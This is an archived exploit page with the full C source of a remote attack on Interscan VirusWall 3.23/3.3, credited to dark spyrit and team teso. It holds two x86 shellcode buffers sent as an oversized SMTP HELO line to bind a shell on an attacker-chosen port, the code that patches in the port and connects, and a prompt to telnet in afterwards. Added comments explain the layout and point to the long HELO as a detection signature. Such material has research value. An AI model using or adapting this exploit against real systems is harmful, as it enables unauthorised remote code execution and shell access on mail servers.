
vwxploit.c

vwxploit.c
Posted Feb 11, 2000
Authored by teso

Interscan VirusWall 3.23/3.3 exploit (by dark spyrit, unix port by team teso)

systems | unix
MD5 | 6a9dfc39dc0464685fe6783cda168a23

vwxploit.c

/* Interscan VirusWall 3.23/3.3 remote
* by dark spyrit <dspyrit@beavuh.org>
* quick unix port by team teso (http://teso.scene.at/).
*
* further information at http://www.beavuh.org.
*/

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>


/* local functions
*/
void usage (void);
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);

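/* shellcode by dark spyrit
*
* Layout, as visible in the two arrays below: each buffer starts with the
* ASCII bytes "helo " (an SMTP HELO command), continues with a long run of
* 0x90 bytes (the x86 NOP opcode) and the payload bytes, and ends with CRLF,
* so the whole buffer reaches the server as a single SMTP command line.
* The "\xff\xff" pair is a placeholder that main() overwrites with the
* chosen port XOR 0x9999.
* At 1314 and 794 bytes, both lines are far longer than the 512-octet SMTP
* command-line limit, so an oversized HELO argument is the observable
* signature for filtering and detection.
*/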
unsigned long sploit_323_len = 1314;
unsigned char sploit_323[] =
"\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\xbb\x10\x0b\x11\x01\xc1\xeb"
"\x02\x8b\xf8\x33\xc0\x50\x48\x90\x50\x59\xf2\xaf"
"\x59\xb1\xc6\x8b\xc7\x48\x80\x30\x99\xe2\xfa\x33"
"\xf6\x96\x90\x90\x56\xff\x13\x8b\xd0\xfc\x33\xc9"
"\xb1\x0b\x49\x32\xc0\xac\x84\xc0\x75\xf9\x52\x51"
"\x56\x52\x66\xbb\x34\x43\xff\x13\xab\x59\x5a\xe2"
"\xec\x32\xc0\xac\x84\xc0\x75\xf9\x66\xbb\xc4\x42"
"\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x06\x32\xc0"
"\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\x66\xbb\x34"
"\x43\xff\x13\xab\x59\x5a\xe2\xec\x83\xc6\x05\x33"
"\xc0\x50\x40\x50\x40\x50\xff\x57\xe8\x93\x6a\x10"
"\x56\x53\xff\x57\xec\x6a\x02\x53\xff\x57\xf0\x33"
"\xc0\x57\x50\xb0\x0c\xab\x58\xab\x40\xab\x5f\x48"
"\x50\x57\x56\xad\x56\xff\x57\xc0\x48\x50\x57\xad"
"\x56\xad\x56\xff\x57\xc0\x48\xb0\x44\x89\x07\x57"
"\xff\x57\xc4\x33\xc0\x8b\x46\xf4\x89\x47\x3c\x89"
"\x47\x40\x8b\x06\x89\x47\x38\x33\xc0\x66\xb8\x01"
"\x01\x89\x47\x2c\x57\x57\x33\xc0\x50\x50\x50\x40"
"\x50\x48\x50\x50\xad\x56\x33\xc0\x50\xff\x57\xc8"
"\xff\x76\xf0\xff\x57\xcc\xff\x76\xfc\xff\x57\xcc"
"\x48\x50\x50\x53\xff\x57\xf4\x8b\xd8\x33\xc0\xb4"
"\x04\x50\xc1\xe8\x04\x50\xff\x57\xd4\x8b\xf0\x33"
"\xc0\x8b\xc8\xb5\x04\x50\x50\x57\x51\x50\xff\x77"
"\xa8\xff\x57\xd0\x83\x3f\x01\x7c\x22\x33\xc0\x50"
"\x57\xff\x37\x56\xff\x77\xa8\xff\x57\xdc\x0b\xc0"
"\x74\x2f\x33\xc0\x50\xff\x37\x56\x53\xff\x57\xf8"
"\x6a\x50\xff\x57\xe0\xeb\xc8\x33\xc0\x50\xb4\x04"
"\x50\x56\x53\xff\x57\xfc\x57\x33\xc9\x51\x50\x56"
"\xff\x77\xac\xff\x57\xd8\x6a\x50\xff\x57\xe0\xeb"
"\xaa\x50\xff\x57\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5"
"\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9"
"\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9"
"\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc"
"\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xda\xf5\xf6"
"\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc"
"\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde"
"\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce"
"\xeb\xf0\xed\xfc\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8"
"\xfd\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99"
"\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99"
"\xce\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2"
"\xfc\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed"
"\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc"
"\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\x9b\x99"
"\xff\xff" /* 16 bit remote port number */
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\xfa\xf4\xfd\xb7\xfc\xe1\xfc\x99\xff\xff\xff\xff"
"\x60\x45\x42\x00\x0d\x0a";

unsigned long sploit_33_len = 794;
unsigned char sploit_33[] =
"\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x4b\x8b"
"\xc3\xbb\x01\x90\x16\x01\xc1\xeb\x02\x8b\xf8\x33"
"\xc0\x50\x48\x90\x50\x59\xf2\xaf\x59\xb1\xc6\x8b"
"\xc7\x48\x80\x30\x99\xe2\xfa\x33\xf6\x96\x90\x90"
"\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x0b\x49\x32"
"\xc0\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\xb3\x80"
"\x90\x90\xff\x13\xab\x59\x5a\xe2\xec\x32\xc0\xac"
"\x84\xc0\x75\xf9\xb3\x01\x4b\x90\x56\xff\x13\x8b"
"\xd0\xfc\x33\xc9\xb1\x06\x32\xc0\xac\x84\xc0\x75"
"\xf9\x52\x51\x56\x52\xb3\x80\x90\x90\xff\x13\xab"
"\x59\x5a\xe2\xec\x83\xc6\x05\x33\xc0\x50\x40\x50"
"\x40\x50\xff\x57\xe8\x93\x6a\x10\x56\x53\xff\x57"
"\xec\x6a\x02\x53\xff\x57\xf0\x33\xc0\x57\x50\xb0"
"\x0c\xab\x58\xab\x40\xab\x5f\x48\x50\x57\x56\xad"
"\x56\xff\x57\xc0\x48\x50\x57\xad\x56\xad\x56\xff"
"\x57\xc0\x48\xb0\x44\x89\x07\x57\xff\x57\xc4\x33"
"\xc0\x8b\x46\xf4\x89\x47\x3c\x89\x47\x40\x8b\x06"
"\x89\x47\x38\x33\xc0\x66\xb8\x01\x01\x89\x47\x2c"
"\x57\x57\x33\xc0\x50\x50\x50\x40\x50\x48\x50\x50"
"\xad\x56\x33\xc0\x50\xff\x57\xc8\xff\x76\xf0\xff"
"\x57\xcc\xff\x76\xfc\xff\x57\xcc\x48\x50\x50\x53"
"\xff\x57\xf4\x8b\xd8\x33\xc0\xb4\x04\x50\xc1\xe8"
"\x04\x50\xff\x57\xd4\x8b\xf0\x33\xc0\x8b\xc8\xb5"
"\x04\x50\x50\x57\x51\x50\xff\x77\xa8\xff\x57\xd0"
"\x83\x3f\x01\x7c\x22\x33\xc0\x50\x57\xff\x37\x56"
"\xff\x77\xa8\xff\x57\xdc\x0b\xc0\x74\x2f\x33\xc0"
"\x50\xff\x37\x56\x53\xff\x57\xf8\x6a\x50\xff\x57"
"\xe0\xeb\xc8\x33\xc0\x50\xb4\x04\x50\x56\x53\xff"
"\x57\xfc\x57\x33\xc9\x51\x50\x56\xff\x77\xac\xff"
"\x57\xd8\x6a\x50\xff\x57\xe0\xeb\xaa\x50\xff\x57"
"\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda"
"\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99\xde\xfc"
"\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\xf6"
"\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa"
"\xfc\xea\xea\xd8\x99\xda\xf5\xf6\xea\xfc\xd1\xf8"
"\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4"
"\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8"
"\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce\xeb\xf0\xed\xfc"
"\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5"
"\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xdc\xe1\xf0\xed"
"\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xce\xca\xd6\xda"
"\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb"
"\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8"
"\xfa\xfa\xfc\xe9\xed\x99\xea\xfc\xf7\xfd\x99\xeb"
"\xfc\xfa\xef\x99\x9b\x99"
"\xff\xff" /* sploit port number */
"\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\xfa\xf4\xfd\xb7"
"\xfc\xe1\xfc\x99\xff\xff\xff\xff\x09\x1f\x40\x00"
"\x0d\x0ah";


/*
 * Write the program banner and the command-line synopsis to stdout, then
 * end the process with EXIT_FAILURE. This function does not return.
 */
void
usage (void)
{
    static const char banner[] =
        "Interscan VirusWall NT 3.23/3.3 remote - http://www.beavuh.org for nfo.\n"
        "by dark spyrit <dspyrit@beavuh.org>\n"
        "quick unix port by team teso\n\n"
        "usage: vwxploit <host> <port> <port to bind shell> <version>\n"
        "eg - vwxploit host.com 25 1234 3.23\n";

    /* The banner holds no conversion specifiers, so fputs emits the same bytes. */
    fputs (banner, stdout);

    exit (EXIT_FAILURE);
}

/* Entry point. Expects exactly four arguments:
 *   <host> <port> <port to bind shell> <version>
 * Selects the payload buffer matching <version>, stores the requested port
 * in that buffer, opens one TCP connection to <host>:<port> and writes the
 * buffer to it.
 *
 * Exits with EXIT_FAILURE on a wrong argument count, a port that parses to
 * 0, an unsupported version string or a failed connection; otherwise exits
 * with EXIT_SUCCESS after the write call, whose result is not checked.
 */
int
main (int argc, char **argv)
{
/* local descriptor; the name hides the socket() function inside main */
int socket;
unsigned char *shellcode;
unsigned char *sh_port_offset;
char *server;
unsigned short int port_dest, port_shell;
size_t sh_len;
struct sockaddr_in sa;

if (argc != 5)
usage ();

server = argv[1];
/* atoi yields 0 for non-numeric text, which the check below rejects;
 * the int result is converted to unsigned short, so larger values wrap. */
port_dest = atoi (argv[2]);
port_shell = atoi (argv[3]);
if (port_dest == 0 || port_shell == 0)
usage ();

/* 1282 and 762 are the byte offsets of the two-byte "\xff\xff" port
 * placeholder inside sploit_323 and sploit_33 respectively. */
if (strcmp (argv[4], "3.23") == 0) {
shellcode = sploit_323;
sh_len = sploit_323_len;
sh_port_offset = sploit_323 + 1282;
} else if (strcmp (argv[4], "3.3") == 0) {
shellcode = sploit_33;
sh_len = sploit_33_len;
sh_port_offset = sploit_33 + 762;
} else {
fprintf (stderr, "unsupported version\n");
exit (EXIT_FAILURE);
}

/* The port is stored XORed with 0x9999, high byte first. This modifies the
 * global array in place.
 * NOTE(review): presumably 0x99 matches the encoding used by the rest of
 * the payload; this function does not establish that. */
port_shell ^= 0x9999;
*sh_port_offset = (char) ((port_shell >> 8) & 0xff);
*(sh_port_offset + 1) = (char) (port_shell & 0xff);

/* 45 is the connect timeout in seconds; descriptor 0 is also treated as
 * a failure here. */
socket = net_connect (&sa, server, port_dest, 45);
if (socket <= 0) {
perror ("net_connect");
exit (EXIT_FAILURE);
}

/* Single write of the whole buffer; the return value is ignored and no
 * reply is read before the connection is closed one second later. */
write (socket, shellcode, sh_len);
sleep (1);
close (socket);

/* Prints the host and the port argument exactly as given on the command
 * line (argv[3] is parsed again because port_shell was XORed above). */
printf ("data send, try \"telnet %s %d\" now\n",
argv[1], atoi (argv[3]));

exit (EXIT_SUCCESS);
}

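/*
 * Translate a dotted-quad string or a host name into an IPv4 address.
 *
 * host: NUL-terminated dotted-quad ("10.0.0.1") or host name.
 *
 * Returns the address in network byte order, or 0 when the name cannot be
 * resolved to an IPv4 address. As with inet_addr() itself, the string
 * "255.255.255.255" is indistinguishable from a parse failure and is
 * therefore handed to the resolver.
 */
unsigned long int
net_resolve (char *host)
{
    in_addr_t addr;
    struct hostent *he;

    /*
     * Compare against INADDR_NONE in the 32-bit in_addr_t domain. Storing
     * the result in a long and testing for -1 never matches where long is
     * 64 bits wide, so host names were never looked up there.
     */
    addr = inet_addr (host);
    if (addr != INADDR_NONE)
        return (addr);

    he = gethostbyname (host);
    if (he == NULL || he->h_addrtype != AF_INET
        || he->h_length != (int) sizeof (addr)
        || he->h_addr_list[0] == NULL)
        return (0);

    /*
     * Copy exactly four bytes. Dereferencing the entry as unsigned long
     * reads past the address where long is 64 bits wide and ignores its
     * alignment.
     */
    memcpy (&addr, he->h_addr_list[0], sizeof (addr));

    return (addr);
}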


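/*
 * Open a TCP connection to server:port, giving up after sec seconds.
 *
 * cs:     filled in with the address family, port and resolved address.
 * server: dotted-quad or host name, resolved through net_resolve().
 * port:   destination port in host byte order.
 * sec:    connect timeout in seconds.
 *
 * The socket is switched to non-blocking mode for the connect and its
 * original file status flags are restored before it is returned.
 *
 * Returns the connected descriptor, or -1 on failure. On every failure
 * path the descriptor is closed and errno is preserved across the close
 * (ETIMEDOUT when the timeout expires). A failed name lookup does not set
 * errno.
 */
int
net_connect (struct sockaddr_in *cs, char *server,
             unsigned short int port, int sec)
{
    int n, error, flags, saved_errno;
    int fd;
    socklen_t len;      /* getsockopt() takes a socklen_t *, not an int * */
    struct timeval tv;
    fd_set rset, wset;

    /* first allocate a socket */
    cs->sin_family = AF_INET;
    cs->sin_port = htons (port);
    fd = socket (cs->sin_family, SOCK_STREAM, 0);
    if (fd == -1)
        return (-1);

    cs->sin_addr.s_addr = net_resolve (server);
    if (cs->sin_addr.s_addr == 0)
        goto fail;

    flags = fcntl (fd, F_GETFL, 0);
    if (flags == -1)
        goto fail;
    if (fcntl (fd, F_SETFL, flags | O_NONBLOCK) == -1)
        goto fail;

    n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
    if (n < 0 && errno != EINPROGRESS)
        goto fail;

    if (n != 0) {
        /* connection still in progress: wait for it, bounded by sec */
        FD_ZERO(&rset);
        FD_ZERO(&wset);
        FD_SET(fd, &rset);
        FD_SET(fd, &wset);
        tv.tv_sec = sec;
        tv.tv_usec = 0;

        n = select (fd + 1, &rset, &wset, NULL, &tv);
        if (n == 0) {
            errno = ETIMEDOUT;
            goto fail;
        }
        if (n == -1)
            goto fail;
        if (!FD_ISSET(fd, &rset) && !FD_ISSET(fd, &wset))
            goto fail;

        /*
         * SO_ERROR holds the outcome of the asynchronous connect. It is
         * queried whenever the socket is reported ready; on a socket that
         * is only writable it reads back 0, the same success as before.
         */
        error = 0;
        len = sizeof (error);
        if (getsockopt (fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
            errno = ETIMEDOUT;
            goto fail;
        }
        if (error != 0) {
            errno = error;
            goto fail;
        }
    }

    /* hand the descriptor back with its original (blocking) flags */
    if (fcntl (fd, F_SETFL, flags) == -1)
        goto fail;

    return (fd);

fail:
    /* several error paths used to return without closing fd */
    saved_errno = errno;
    close (fd);
    errno = saved_errno;
    return (-1);
}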
